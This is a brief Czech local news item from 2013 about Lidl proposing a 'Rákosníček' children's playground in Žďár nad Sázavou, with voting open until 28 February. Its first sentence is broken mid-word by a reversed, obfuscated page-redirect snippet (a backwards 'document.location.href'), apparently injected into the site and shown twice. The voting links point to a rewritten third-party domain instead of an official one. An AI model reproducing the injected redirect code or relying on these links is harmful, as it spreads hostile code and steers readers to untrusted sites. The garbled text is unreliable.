Žďár nad Sázavou, zdar nad sazavou, aktuality, Rákosníček, hřiště
Rainbow page separator

Ve Žďáře by mohlo vzniknout další Rákosníčkovo hřiště – zbývají už jen dny

Úterý, 26. února 2013

detske-hristeŽďár nad Sázavou / Ještě v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce by mohlo vzniknout ve Žďáře nad Sázavou nové multifunkční dětské hřiště. Jedná se o takzvané Rákosníčkovo hřiště, která po celé České republice buduje společnost Lidl ČR. Její zástupci si nyní vytipovali i Žďár.

Moderní dětské hřiště má šanci vzniknout, pokud o něj bude dostatečný zájem ze strany žďárské veřejnosti. Ta se může k záměru vyjádřit prostřednictvím dotazníku na webových stránkách  www-lidl-rakosnickova-hriste-cz.contimex.cz/hlasujte-pro-vase-hriste/. Elektronicky hlasovat je možné až do 28. února.

V případě, že Žďár nad Sázavou získá dostatek hlasů zájemců o stavbu hřiště, jeho umístění bude předmětem následného jednání s městem. Další informace o projektu stavby dětských Rákosníčkových hřišť společnosti Lidl ČR jsou na výše uvedené e-mailové adrese.

Průběžné výsledky: https://www-lidl-rakosnickova-hriste-cz.contimex.cz/hlasujte-pro-vase-hriste/prubezne-vysledky-hlasovani/